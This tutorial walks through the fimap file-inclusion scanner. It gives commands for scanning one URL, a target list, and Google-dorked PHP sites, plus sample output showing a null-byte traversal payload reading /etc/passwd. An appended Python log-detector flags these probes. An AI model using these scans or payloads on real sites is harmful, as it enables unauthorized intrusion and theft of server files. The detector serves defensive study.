FIMAP is a simple and amazing tool used for penetration testing. It was made by Iman Karim and is one of his projects on Google Code. He wrote it in Python, so it is very easy to use for scanning a site for bugs or vulnerabilities. So, for more guidance, let’s begin the show…
1. Download FIMAP
You can download this tool here or here.
2. Extract the compressed file
To extract the downloaded file, use the “tar -xvf” command, like this:
root@bt:~# tar -xvf fimap_alpha_v07.tar.gz
3. Then go to the extracted directory
Just use cd. I’m sure you already know it.
4. Run FIMAP
To run this tool, you can type “./fimap.py” or “python fimap.py”.
5. The output should be the help page for this tool
6. a. To scan a single page
To scan a single page, you have to give the complete target URL, for example:
root@bt:fimap_alpha_v07# ./fimap.py -s -u 'http://target.site/index.php?cat=main'
If a bug/vulnerability is found in the URL, it will be shown like this:
fimap v.07 by Iman Karim – Automatic LFI/RFI scanner and exploiter.
SingleScan is testing URL: ‘http://target.site/index.php?cat=main’
[OUT] Parsing URL ‘http://target.site/index.php?cat=main’…
[INFO] Fiddling around with URL…
[OUT] Possible file inclusion found! -> ‘http://target.site/index.php?cat=a4EihiFP’ with Parameter ‘cat’.
[OUT] Identifying Vulnerability ‘http://target.site/index.php?cat=main’ with Parameter ‘cat’…
[INFO] Scriptpath received: ‘/www/target’
[INFO] Trying NULL-Byte Poisoning to get rid of the suffix…
[INFO] NULL-Byte Poisoning successfull!
[INFO] Testing file ‘/etc/passwd’…
[INFO] Testing file ‘/proc/self/environ’…
[INFO] Skipping absolute file ‘php://input’.
[INFO] Testing file ‘/var/log/apache2/access.log’…
[INFO] Testing file ‘/var/log/apache/access.log’…
[INFO] Testing file ‘/var/log/httpd/access.log’…
[INFO] Testing file ‘/var/log/apache2/access_log’…
[INFO] Testing file ‘/var/log/apache/access_log’…
[INFO] Testing file ‘/var/log/httpd/access_log’…
[INFO] Skipping remote file ‘http://www.phpbb.de/index.php’.
[INFO] Skipping remote file ‘http://www.uni-bonn.de/Frauengeschichte/index.html’.
[INFO] Skipping remote file ‘http://www.kah-bonn.de/index.htm?presse/winterthur.htm’.
##################################################################
#[1] Possible File Injection #
##################################################################
# [URL] http://target.site/index.php?cat=main #
# [PARAM] cat #
# [PATH] /www/target #
# [TYPE] Relative with appendix ‘.php’ #
# [NULLBYTE] Works. #
# [READABLE FILES] #
# [0] /etc/passwd -> ../../../etc/passwd%00 #
##################################################################
b. To scan multiple pages at once
First, you have to make a list of targets. For example, I made a list, saved it as “targetlist.txt” in the /tmp directory, and then ran this command:
root@bt:fimap_alpha_v07# ./fimap.py -m -l '/tmp/targetlist.txt'
c. Use Google to search for File Inclusion errors
Since we know that file inclusion can sometimes be found wherever PHP's include functions are used, we can search for it using URL patterns that web developers commonly use. You can use this command:
root@bt:fimap_alpha_v07# ./fimap.py -g -q 'inurl:php?cat= site:.com'
There are many more functions and features in this tool; all you have to do is explore it yourself. But please don’t use this tool to penetrate and crack someone's website.
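On the defending side, the probes visible in the single-page scan output above (traversal sequences, the %00 suffix trick, the tested file paths, remote URLs in a parameter) leave recognizable traces in the web server's access log. The Python sketch below is an added example, not part of fimap or of the original post; it assumes Apache combined-format logs, and the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Paths the scan output above shows being tested, plus the php://input wrapper.
SENSITIVE = ("/etc/passwd", "/proc/self/environ", "php://input",
             "/var/log/apache", "/var/log/httpd")
# Combined log format (assumed): client, ident, user, [time], "request", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(value):
    """Return file-inclusion indicators found in one decoded parameter value."""
    value = unquote(unquote(value))   # peel off extra layers of URL-encoding
    low = value.lower().replace("\\", "/")
    hits = []
    if "../" in low:
        hits.append("traversal")
    if "\x00" in value:               # %00 used to cut off an appended suffix
        hits.append("nullbyte")
    if any(s in low for s in SENSITIVE):
        hits.append("sensitive-file")
    if re.match(r"(https?|ftp)://", low):
        hits.append("remote-url")
    return hits

def scan(lines):
    """Return (client, parameter, status, indicators) for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                  # not a request line we can parse
        client, _method, target, status = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((client, name, status, hits))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
T = "[10/Oct/2023:13:55:36 +0000]"
SAMPLE = [
    f'198.51.100.7 - - {T} "GET /index.php?cat=main HTTP/1.1" 200 5120',
    f'198.51.100.7 - - {T} "GET /index.php?cat=../../../etc/passwd%00 HTTP/1.1" 200 1432',
    f'198.51.100.7 - - {T} "GET /index.php?cat=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 404 300',
    f'192.0.2.10 - - {T} "GET /index.php?cat=http://example.org/x.txt HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```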

